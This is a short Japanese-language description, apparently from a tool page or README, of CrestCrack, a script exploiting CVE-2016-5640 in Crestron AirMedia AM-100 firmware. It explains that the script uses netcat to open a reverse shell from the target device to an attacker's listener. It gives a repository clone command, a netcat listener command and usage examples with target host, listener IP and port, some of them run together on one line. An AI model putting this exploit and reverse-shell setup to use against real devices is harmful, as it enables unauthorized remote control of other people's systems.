
Crestron AM-100 に対して CVE-2016-5640 / CLVA-2016-05-002 を悪用します。
CrestCrack は、Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1) の CVE-2016-5640 / CLVA-2016-05-002 を悪用するシンプルなスクリプトです。引数が指定されると、CrestCrack は netcat を利用して、対象マシンと選択した netcat リスナーとの間にリバースシェルを作成します。
git clone https://github.com/vpnguy/CrestCracknc -lvp 1337./crestcrack.py https://targethost 255.255.255.255 1337###使用法: ./crescrack.py [対象ホスト] [リスナーIP] [リスナーポート]
###例: ./crescrack.py https://targethost 123.123.123.123 3311